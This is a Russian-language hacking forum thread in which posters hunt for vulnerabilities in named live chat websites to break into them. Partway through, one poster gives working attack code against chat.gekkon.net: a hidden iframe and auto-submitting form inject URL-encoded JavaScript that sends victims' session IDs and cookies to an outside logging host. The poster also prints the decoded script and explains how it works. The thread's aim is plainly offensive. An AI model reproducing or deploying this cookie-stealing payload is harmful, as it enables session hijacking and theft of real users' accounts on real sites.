Люди, как обстоит дело с html чатами это понятно, но что делать с php:(( вот моя мешень- www.chat.lg.ua !!! Что я только непробвал- БЕСПОЛЕЗННОhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif Народ помагите найти изьян в этом чате !!!
Ps: Зарание огромное спасибо

Почитай мои месаги или обращайся мне на мыло

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (~Ice_night_BeTeP~ @ сентября 17 2004,11:21)</td></tr><tr><td id="QUOTE">Почитай мои месаги или обращайся мне на мыло[/QUOTE]<span id='postcolor'>
Дф фили к тебе обращаться!!! Там установлен VooDoo chat я эту тему открувал уже - ответов = 0
Глухой чат! та серьёзных дыр нет! так что можешь и не пытаться хотьты и говорил что типа там всё омжешь! ГЫГ

патыться всегда можно! везде есть дыры! http://forum.antichat.ru/iB_html/non-cgi/emoticons/tounge.gif &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif

www.chat.lg.ua бреш найдена! http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif

frika
Вот видишь, что говорит zFailure. http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif

Pengo

Сказать можно всё что угодно!!! А вот где сказанное в деле?

млин я просто проверить не могу, этот чат почемуто не грузится у меня - окно с мессагами белое

zFailure
У тебя такая же проблема? У меня сёдня пол чатов не грузилось таким образом, во млин.... http://forum.antichat.ru/iB_html/non-cgi/emoticons/mad.gif http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif

нда!!! как говоритса хорошому танцору!!!

ВСЁ! ЖОПА ТВОЕМУ www.chat.lg.ua.
Полез искать дыры!

НЕТ ЧАТОВ БЕЗ УЯЗВИМОСТЕЙ !!! Аксиома блин...Кибер пространство мобильно http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif не сегодня-завтра появицца чел который банально легко замочит любую корпорацию...и в свою очередь какой-нить 14 летний чувак из Питера мочканет и его....
Матрица блин http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif

ГЫ!!! Умных вещей можно сказать много! Но их нужно сделать!

народ! хотите видео со взломом www.chat.lg.ua ?

а оно большое? если 15 мег или меньше, то я хочу... http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

Конечно НЕ хотим!!! а хотелось бы только статью по взлому того чата!!!

2 frika честно говоря статью мне влом писать потому что слишком много вопросов остается

вот пример
http://forum.antichat.ru/cgi-bin....;t=2987 (http://forum.antichat.ru/cgi-bin/ikonboard.cgi?act=ST;f=7;t=2987)

я написал человеку как срипты исполнять, а он мне типа в поле места не хватает! http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif ну вот как мне ему объяснить...
что он полный ламер в этом деле, обижать человека ведь тоже не хочется!

что-то глючит у меня чат!

короче сессию можно украсть след. способом
заманить юзера на http://privet12.narod.ru

ибо index.html
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><iframe name="sniff" id="sniff" width="0" height="0"></iframe>

<form action="http://chat.gekkon.net/users.php" method="post" target="sniff">
<input type="hidden" name="look_for" value="">
</form>

<script type="text/javascript">

document.forms[0].elements[0].value=unescape('%3C% 73%63%72%69%70%74%3E%7A%3D%77%69%6E%64%6F%77%2E%6F %70%65%6E%28%27%27%2C%27%76%6F%63%5F%73%65%6E%64%6 5%72%27%29%3B%78%3D%6E%65%77%20%49%6D%61%67%65%28% 29%3B%78%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%61 %6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%6 9%6E%2F%73%2E%6A%70%67%3F%27%2B%7A%2E%6C%6F%63%61% 74%69%6F%6E%2B%27%23%23%23%27%2B%64%6F%63%75%6D%65 %6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%7 0%74%3E');
document.forms[0].submit();

</script>[/QUOTE]<span id='postcolor'>

после посещения сессия и куки пользователя оказывается в логе


в unescape что-то вроде
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><script>z=window.open('','voc_sender');x=new Image();x.src='http://antichat.ru/cgi-bin/s.jpg?'+z.location+'###'+document.cookie;</script>[/QUOTE]<span id='postcolor'>

Дааа... это понятно!!! на такой способо у меня своих скриптов то валом!!! там бы как нить попытаться впилить хтмл код... или через инфу... или через ник... ну или ИЛИ...
Вот!

можт и можно!
только блин мой прокси на 8080-порту работает и чат на томже! из-за этого у меня окно с сообщениями не загружается =(

а вообще если чесно то я совсем не понял смыл этого кода
&lt;iframe name=&quot;sniff&quot; id=&quot;sniff&quot; width=&quot;0&quot; height=&quot;0&quot;&gt;&lt;/iframe&gt;

&lt;form action=&quot;http://chat.gekkon.net/users.php&quot; method=&quot;post&quot; target=&quot;sniff&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;look_for&quot; value=&quot;&quot;&gt;
&lt;/form&gt;

<script type=&quot;text/javascript&quot;&gt;

document.forms[0].elements[0].value=unescape('%3C%73%63%72%69%70%74%3E%7A%3D%77 %69%6E%64%6F%77%2E%6F%70%65%6E%28%27%27%2C%27%76%6 F%63%5F%73%65%6E%64%65%72%27%29%3B%78%3D%6E%65%77% 20%49%6D%61%67%65%28%29%3B%78%2E%73%72%63%3D%27%68 %74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%7 5%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%27% 2B%7A%2E%6C%6F%63%61%74%69%6F%6E%2B%27%23%23%23%27 %2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3 B%3C%2F%73%63%72%69%70%74%3E'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif;
document.forms[0].submit();

&lt;/script&gt;

ХМ... помоему он совсем не нужен!!! ГЫ результат то ты видел сам итоговый?

смысл очень просто в скрытый фрем отсылается форма с кодом

в свою очередь код выполняется

в коде идет обращение к окну по его имени и берется идентификатор сессии из переменной location и отправляется

всё!!! ясно!!! ну вообщем я попросил тчоб в том чате убрали с 8080 порта его!!! так что сказали уберут!!! теперь можешь глянуть!